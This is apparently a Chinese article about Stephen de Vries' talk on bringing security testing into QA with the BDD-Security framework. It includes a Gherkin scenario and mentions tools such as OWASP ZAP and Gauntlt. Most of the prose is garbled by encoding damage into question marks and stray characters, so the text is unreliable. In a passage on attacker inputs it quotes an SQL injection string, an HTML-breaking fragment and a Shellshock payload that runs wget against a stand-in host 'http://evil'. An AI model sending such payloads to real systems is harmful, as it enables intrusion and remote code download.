???????????????????

???????????? ???????[ 2015/3/18 13:28:40 ] ??????????????? ???? ???????

????ContinuumSecurity?????Stephen de Vries????Velocity Europe 2014????????????????????????????????Stephen???????些???????????????????QA???????????????????????????????????????????BDD-Security?????????JBehave???????Given-When-Then???????????????
????????????????????????????????????????????????蔚?????????????????????????????????????????????????校???????????????????????????????????????????????????????????????Stephen?????????????????????QA?????????????????????????????????????????????婵�????????????????????????????????????????小?
??????????QA??????????????????????????????Stephen????C. Maartmann-Moe??Bill Sempf????????????
??????QA?????
????QA?????????????????????????????0??????????999999999???????????????妫�????-1?????????????sfdeljknesv??
?????????????
???????????????????????????????????????”>??????????’or 1=1-??????????() { :; }; wget -O /beers http://evil; /???????????????????????????????????校????????????????????????????????????????????????????????????????????????????????屑????Stephen????BDD??????????????????????????????????????????BDD-Security??????????
????????BDD-Security?????JBehave???????????????BDD???????????Gherkin?????BDD-Security??????????锟�?
????Scenario: Transmit authentication credentials over HTTPS
????Meta: @id auth_https
????Given the browser is configured to use an intercepting proxy
????And the proxy logs are cleared
????And the default user logs in with credentials from: users.table
????And the HTTP request-response containing the default credentials is inspected
????Then the protocol should be HTTPS
????BDD-Security??????渭??写?????????????????BDD-Security????????写???
?????????????????e??????????????????????????????????????味????????????????????小????????????????校????????????????
??????????BDD-Security????????????????????????邪???????????????????????????写????????械???2?????????——??????????屑??伞?????????????????????????写?????????????
????BDD-Security?????????????????????????芯????????????????????????琛�??些??????OWASP ZAP??Nessus???
????Stephen?????????些????????????????Zap-WebDriver???????????????????BDD????????????????????Gauntlt??BDD-Security??????????????BDD???????????????????Ruby??Mittn??Python??写???????????Gherkin??